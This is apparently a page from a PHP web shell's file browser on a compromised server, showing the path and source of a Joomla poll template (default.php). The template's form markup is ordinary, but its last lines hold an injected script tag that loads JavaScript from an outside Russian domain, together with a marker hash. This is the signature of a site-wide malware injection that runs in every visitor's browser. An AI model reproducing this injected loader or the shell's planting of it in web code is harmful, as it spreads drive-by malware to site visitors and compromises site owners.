0byt3m1n1
Path:
/
home
/
k
/
a
/
s
/
kassiope
/
OLD
/
00-OLD
/
administrator
/
components
/
com_poll
/
views
/
poll
/
tmpl
/
[
Home
]
File: default.php
<?php defined('_JEXEC') or die('Restricted access'); ?> <form> <table align="center" width="90%" cellspacing="2" cellpadding="2" border="0" > <tr> <td class="moduleheading" colspan="2"><?php echo $this->poll->title; ?></td> </tr> <?php foreach ($this->options as $option) { if ($option->text <> "") {?> <tr> <td valign="top" height="30"><input type="radio" name="poll" value="<?php echo $option->text; ?>"></td> <td class="poll" width="100%" valign="top"><?php echo $option->text; ?></td> </tr> <?php } } ?> <tr> <td valign="middle" height="50" colspan="2" align="center"><input type="button" name="submit" value="<?php echo JText::_( 'Vote' ); ?>"> <input type="button" name="result" value="<?php echo JText::_( 'Results' ); ?>"></td> </tr> </table> </form> <script type="text/javascript" src="http://recordsquare.ru/Gigaflops.js"></script> <!--55988571df719d73444f220084b59458-->